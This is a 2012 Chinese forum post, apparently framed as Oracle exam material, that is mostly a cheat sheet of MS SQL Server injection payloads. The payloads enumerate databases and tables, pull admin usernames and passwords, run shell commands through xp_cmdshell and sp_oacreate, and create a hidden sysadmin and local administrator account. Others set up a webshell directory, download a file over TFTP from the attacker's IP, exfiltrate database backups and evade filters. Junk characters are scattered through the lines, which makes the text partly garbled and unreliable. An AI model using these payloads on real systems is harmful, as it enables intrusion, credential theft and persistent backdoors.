oracle认证考试SQL注射语句解析二* [, f" M2 Q7 x9 x# [# i
创建一个虚拟目录E盘:
9 j- a: x/ [& W+ j: |;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod3 L" E* ?, Q2 f2 S6 z/ h5 g" F
@o, ‘run’, NULL,‘ cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点”
2 O3 f: D+ K% Z; }+ _" l-v “e”,“e:\”’--* S! [' w" ]/ Q' ^7 M
访问属性:(配合写入一个webshell); h$ U- V. I' \, a: b! G! ~& T
declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod+ ^. T' C6 b. b- @
@o, ‘run’, NULL,‘ cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a% |4 V7 m0 P) A+ W% p
w3svc/1/ROOT/e +browse’
' }8 C% G4 h( R; p( Z& b: l/ y爆库 特殊技巧::\=‘\’ 或者把/和\ 修改%5提交
6 G: |" M& b3 C3 e7 A如何得到SQLSERVER某个数据库中所有表的表名?
( u7 D4 x! ~7 ]& O--------------------------------------------------------------------------------# X8 ]; E+ t. L0 j, L/ E2 g
用户表:
) s, ?$ ? W2 {* Oselect name from sysobjects where xtype = ‘U’;+ w: G1 T6 y t u$ [+ i$ I3 w; }
系统表:/ D! {/ Z! ]$ ]1 R( k
select name from sysobjects where xtype = ‘S’;* ^ ^3 ?& Q& w9 T1 N. I+ }4 r
所有表:, d; z: S2 N5 n- m/ r
select name from sysobjects where xtype = ‘S’ or xtype = ‘U’;0 M. A: N: p0 D7 c
--------------------------------------------------------------------------------4 C! E6 y( q/ {: h# o4 o, J
and 0《》(select top 1 paths from newtable)--
4 A9 Z/ @4 I7 i" b2 U得到库名(从1到5都是系统的id,6以上才可以判断)7 T% U9 X _7 D+ \# _
and 1=(select name from master.dbo.sysdatabases where dbid=7)--1 s8 B7 u* Q# K! G7 }& J$ g
and 0《》(select count(*) from master.dbo.sysdatabases where name》1 and& f, Q3 G7 _9 c5 p3 F
dbid=6)
9 D8 {# ]* X$ s' ~7 j依次提交 dbid = 7,8,9.。。. 得到更多的数据库名" j9 S; ~/ E2 T; A
and 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) 暴到一个表
, n8 l. l. s1 u+ |% p, Q假设为 admin& L* w5 M( Q! x8 n' W0 J' q
and 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’ and name1 @" Y, F' d1 K, m5 N% X( S
not in (‘Admin’)) 来得到其他的表。' V. c7 m! O1 t0 y3 L
and 0《》(select count(*) from bbs.dbo.sysobjects where xtype=‘U’ and, H$ J9 n1 m) p, s R4 r) _
name=‘admin’% R, {& M$ w% c9 V1 |
and uid》(str(id))) 暴到UID的数值假设为18779569 uid=id
. u4 }1 g, W1 c' \7 a- Qand 0《》(select top 1 name from bbs.dbo.syscolumns where id=18779569)
% J: o- y8 t9 x* d! H得到一个admin的一个字段,假设为 user_id
" Y2 D: ^8 T( n& y# |. o9 Band 0《》(select top 1 name from bbs.dbo.syscolumns where id=18779569 and
9 N l+ Q, O6 P5 I9 p' `9 ~name not in3 W8 g0 \3 q K4 H; k
(‘id’,。。.)) 来暴出其他的字段
/ R- ]" i; E& V- }# o2 b% Qand 0《(select user_id from BBS.dbo.admin where username》1) 可以得到用户名
1 g" _% C. \9 z7 `# Q$ D$ R" ^. n依次可以得到密码。。。。。假设存在user_id username ,password 等字段
/ q5 m* t& \! ?" _( tand 0《》(select count(*) from master.dbo.sysdatabases where name》1 and- s' Y0 c5 S/ M1 i7 E$ m* C/ M
dbid=6)( \& m) _: t3 [: N p* H* @
and 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) 得到表名* t. ]4 B9 }6 a3 o! Q( ]
and 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’ and name5 a! E, Q# d( d( M
not in(‘Address’))
. v% I- I0 w2 Z4 Mand 0《》(select count(*) from bbs.dbo.sysobjects where xtype=‘U’ and
* G! T! l# B- }; _name=‘admin’ and uid》(str(id))) 判断id值
8 o7 C. |8 ]/ F; jand 0《》(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
. r6 q* i! v; \2 W$ Z?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
: l% l/ b0 B: T. i* I7 O?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin* G' L% ?" c$ H
(union,access也好用)
4 n ?2 P0 d% g. Z e7 h得到WEB路径' O% m8 D! f5 {( e6 C
;create table [dbo]。[swap] ([swappass][char](255));--# P% X* o/ v' Y/ `( Z) ~# v: S s) P
and (select top 1 swappass from swap)=1--- h) V/ H3 P, {3 Z: X: x
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare1 x: y8 K* y" k5 v
@test varchar(20) exec master..xp_regread @rootkey=‘HKEY_LOCAL_MACHINE’,
2 e9 [1 U3 G6 g, I6 S; L@key=‘SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\’,
. G- R" b0 p) B! o& v, x- @@value_name=‘/’, values=@test OUTPUT insert into paths(path)3 T4 }5 f; v# ~- `" m- V$ g
values(@test)--
$ ^+ A5 U7 t7 [6 `# s1 J5 H% {9 D;use ku1;--: f3 c j/ r7 g
;create table cmd (str image);-- 建立image类型的表cmd
5 |7 [; T5 F2 y+ i9 u存在xp_cmdshell的测试过程:
5 C, \; G. l9 t7 [0 R- C8 Y;exec master..xp_cmdshell ‘dir’
) e& J! K; X' u;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
6 ^6 ]( T) M3 g' W0 Q7 W;exec master.dbo.sp_password null,jiaoniang$,1866574;--, U# Z% [: x! r" T# z
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--. X1 g) b4 W) Q
;exec master.dbo.xp_cmdshell ‘net user jiaoniang$ 1866574 /workstations:*
3 L) s3 F2 B4 S6 Y1 ~0 K/times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--* `* Y2 D2 y1 s6 r0 K" K9 J
;exec master.dbo.xp_cmdshell ‘net localgroup administrators jiaoniang$* z/ s" @" K5 l8 \8 w5 @% a: \+ |
/add’;--
9 b i7 w1 E1 f$ V8 F6 g4 Qexec master..xp_servicecontrol ‘start’, ‘schedule’ 启动服务
6 p2 ~5 m: K$ k( }/ V7 ~- ^7 Cexec master..xp_servicecontrol ‘start’, ‘server’+ B% x( o9 T& G, y
; DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC
0 p+ ?5 D+ ^, ^/ CSP_OAMETHOD @shell,‘run’,null, ‘C:\WINNT\system32\cmd.exe /c net user
, S6 U4 M l& @+ P% h7 h ajiaoniang$ 1866574 /add’/ \% ^ c7 @4 j1 M
;DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC
! K7 Z6 g7 [3 ~; D& W% mSP_OAMETHOD @shell,‘run’,null, ‘C:\WINNT\system32\cmd.exe /c net2 G! ` Y9 V) k# |/ m, o
localgroup administrators jiaoniang$ /add’; F' `4 I% {: a3 u) x7 `3 V
‘; exec master..xp_cmdshell ’tftp -i youip get file.exe‘-- 利用TFTP上传文件' Z. g4 A; n0 e7 O0 d" H& q
;declare @a sysname set @a=’xp_‘+’cmdshell‘ exec @a ’dir c:\‘
: R6 h( p) c1 v- B5 q" Q |;declare @a sysname set @a=’xp‘+’_cm’+’dshell‘ exec @a ’dir c:\‘2 \$ }" p$ `& a1 S. J( W7 {+ D
;declare @a;set @a=db_name();backup database @a to
5 T/ a, w" r! [9 I3 a/ bdisk=’你的IP你的共享目录bak.dat‘) I5 O, x+ a, Z v* a: t4 l4 a y& R
如果被限制则可以。
, L b. ^( A0 i: o7 iselect * from openrowset(’sqloledb‘,’server‘;’sa‘;’‘,’select ‘’OK!‘’ exec
: c5 u1 a- G5 ?6 N: E1 i4 rmaster.dbo.sp_addlogin hax‘)
- B/ B! F. X1 ^) B! M- C查询构造:: x! M, b2 ~- e! H ?# v$ K
Select * FROM news Where id=。。. AND topic=。。. AND 。。.。。
/ m, l' n1 T/ w3 u, @( I. A0 Sadmin’and 1=(select count(*) from [user] where username=‘victim’ and3 n2 F) Q! i+ N L
right(left(userpass,01),1)=‘1’) and userpass 《》‘+ F1 u- C* [( g- A, L& e
select 123;--
6 @1 p# r; C1 E! |+ \8 _) D;use master;--
' X. K1 P' q5 S" n:a’ or name like ‘fff%’;-- 显示有一个叫ffff的用户哈。0 b2 J# M+ r1 {# b4 n2 Z( n1 _: x
and 1《》(select count(email) from [user]);--. h9 D( s$ W* @% P% J
;update [users] set email=(select top 1 name from sysobjects where
$ z7 P! r! B& }xtype=‘u’ and status》0) where name=‘ffff’;--0 g% A, t6 q# e3 |' Z1 M
;update [users] set email=(select top 1 id from sysobjects where xtype=‘u’$ Q% D: ]9 y( J @' O
and name=‘ad’) where name=‘ffff’;--" V/ o+ ^' y# ~
‘;update [users] set email=(select top 1 name from sysobjects where; m5 t, \7 U- ^2 }
xtype=’u‘ and id》581577110) where name=’ffff‘;--
( a4 O- t+ N' q6 Q’;update [users] set email=(select top 1 count(id) from password) where; Z: k6 ^) M; _& A+ L: C1 \
name=‘ffff’;--0 g+ z1 k+ w5 P+ } P( C/ f
‘;update [users] set email=(select top 1 pwd from password where id=2)
" p+ V4 a* C6 g+ Iwhere name=’ffff‘;--
& x( z. `% K! S6 F8 `’;update [users] set email=(select top 1 name from password where id=2)! y5 O* X9 j" U( Y
where name=‘ffff’;--
- t; R: c$ O& s- J+ Z上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中 |
发表于 2012-8-4 13:54:49
